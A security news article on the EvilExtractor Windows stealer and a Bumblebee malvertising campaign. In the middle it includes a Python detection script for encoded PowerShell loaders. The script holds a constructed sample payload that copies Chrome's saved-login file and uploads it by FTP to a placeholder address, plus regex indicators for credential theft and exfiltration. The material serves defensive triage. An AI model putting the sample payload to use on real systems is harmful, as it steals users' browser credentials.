EvilExtractor: A thief for Windows systems appears on the Dark Web

A new data-stealing malware called EvilExtractor is available for sale and targets files from Windows systems.


"It includes several modules that all work through an FTP service," said Cara Lin, a researcher at Fortinet FortiGuard Labs. "It also contains environment-checking and anti-VM functions. Its main purpose appears to be to steal browser data and information from compromised endpoints and then upload them to the attacker's FTP server."

The network security firm said it noticed a wave of attacks spreading the malware in March 2023, with the majority of victims located in Europe and the US. While EvilExtractor is marketed as an educational tool, it has been adopted by hackers as an information stealer.

The tool is sold by a hacker using the name Kodex on cybercrime forums such as Cracked, with the earliest listing dating back to October 22, 2022. It is continuously updated and bundles various modules to extract system metadata, passwords and cookies from several web browsers, to log keystrokes, and even to act as ransomware by encrypting files on the target system.

The malware is also said to have been used in a phishing email campaign the company detected on March 30, 2023. The emails trick recipients into launching an executable file disguised as a PDF document, under the pretext of confirming their account details.

The "Account_Info.exe" binary is an obfuscated Python program that launches a .NET loader, which in turn uses a Base64-encoded PowerShell script to run EvilExtractor. Besides collecting files, the malware can also activate the webcam and capture screenshots.
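The loader chain described above (an obfuscated launcher starting a .NET loader that runs Base64-encoded PowerShell) leaves a distinctive trace in process-creation telemetry: powershell.exe started with an encoded-command argument by a parent executable sitting in a user-writable folder. The triage script below is an added example for this page, not Fortinet's analysis code and not the malware's; it decodes the UTF-16LE Base64 payload from constructed process-creation records and scores it against indicators taken from the article's description (FTP upload, anti-VM checks, browser credential stores). The record layout, the indicator regexes, the documentation-range IP address and the sample command lines are all assumptions constructed for the example.

```python
import base64
import re
from typing import Optional

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; the common
# ones seen in loaders are listed explicitly. The argument must look like a
# Base64 run of at least 16 characters so that "-ExecutionPolicy Bypass" and
# similar switches are not mistaken for an encoded payload.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)

# Assumed indicators derived from the article: FTP exfiltration, anti-VM
# checks, and access to browser credential/cookie stores. "download_exec"
# is a generic loader pattern added for completeness.
INDICATORS = {
    "ftp_upload": re.compile(r"(?i)ftp://|FtpWebRequest|WebRequestMethods[.+]Ftp"),
    "anti_vm": re.compile(r"(?i)VMware|VirtualBox|VBox|Win32_ComputerSystem.*Model"),
    "browser_cred_files": re.compile(r"(?i)Login Data|Cookies|logins\.json"),
    "download_exec": re.compile(r"(?i)DownloadString|DownloadFile|\bIEX\b|Invoke-Expression"),
}

# Parent binaries running from user-writable locations (assumed heuristic).
USER_PATH = re.compile(r"(?i)\\Users\\[^\\]+\\(?:Downloads|AppData|Desktop)\\|\\Temp\\")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded PowerShell script, or None if no valid payload."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # -EncodedCommand is always UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record: dict) -> dict:
    """Score one process-creation record (parent, image, cmdline)."""
    script = decode_encoded_command(record["cmdline"])
    hits = [name for name, rx in INDICATORS.items() if script and rx.search(script)]
    from_user_path = bool(USER_PATH.search(record["parent"]))
    if script is not None and len(hits) >= 2:
        verdict = "malicious"
    elif script is not None and (hits or from_user_path):
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {
        "encoded": script is not None,
        "script": script,
        "indicators": hits,
        "parent_from_user_path": from_user_path,
        "verdict": verdict,
    }


def triage(records: list) -> list:
    return [analyze(r) for r in records]


def _enc(script: str) -> str:
    """Encode a script the way a loader would pass it to -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample payload (never executed here): mimics the behaviours the
# article attributes to the stealer. 203.0.113.10 is a documentation address.
SAMPLE_STEALER = (
    '$vm = (Get-WmiObject Win32_ComputerSystem).Model; '
    'if ($vm -match "VMware|VirtualBox") { exit }; '
    'Copy-Item "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data" $env:TEMP\\ld; '
    '$r = [System.Net.FtpWebRequest]::Create("ftp://203.0.113.10/loot/ld"); '
    '$r.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile'
)

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records, not real telemetry.
SAMPLE_RECORDS = [
    {"parent": r"C:\Users\victim\Downloads\Account_Info.exe", "image": PS_EXE,
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {_enc(SAMPLE_STEALER)}"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS_EXE,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS_EXE,
     "cmdline": f"powershell -ec {_enc('Get-Date')}"},
]

if __name__ == "__main__":
    for rec, res in zip(SAMPLE_RECORDS, triage(SAMPLE_RECORDS)):
        print(res["verdict"], rec["parent"], res["indicators"])
```

The verdict thresholds are deliberately simple: two or more content indicators in a decoded payload is treated as malicious, while a lone indicator or an encoded command from a user-writable parent only raises a suspicious flag for an analyst to review, so that routine encoded one-liners from administrators are not paged on.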

"EvilExtractor is used as a complete information stealer with multiple malicious features, including ransomware," said Lin. "The PowerShell script can escape detection in a .NET or PyArmor loader. Within a very short period of time, its developer has updated several functions and increased its stability."

The findings come as Secureworks' Counter Threat Unit (CTU) details a malicious SEO campaign used to deliver the Bumblebee malware loader via rogue installers of legitimate software.


Bumblebee, first reported a year ago by Google's Threat Analysis Group and Proofpoint, is a modular loader that spreads primarily through phishing. It is suspected to have been developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.

The use of malicious ads to redirect users searching for popular tools such as ChatGPT, Cisco AnyConnect, Citrix Workspace and Zoom to fake websites hosting trojanized installers has been on the rise in recent months, after Microsoft began blocking macros by default in Office files downloaded from the web.

In one incident described by the firm, the attacker used Bumblebee to gain an initial foothold and, about three hours later, moved laterally using Cobalt Strike and legitimate remote access software such as AnyDesk and Dameware. The attack was stopped before it reached the final ransomware stage.

iGuRu.gr

Written by Anastasis Vasileiadis
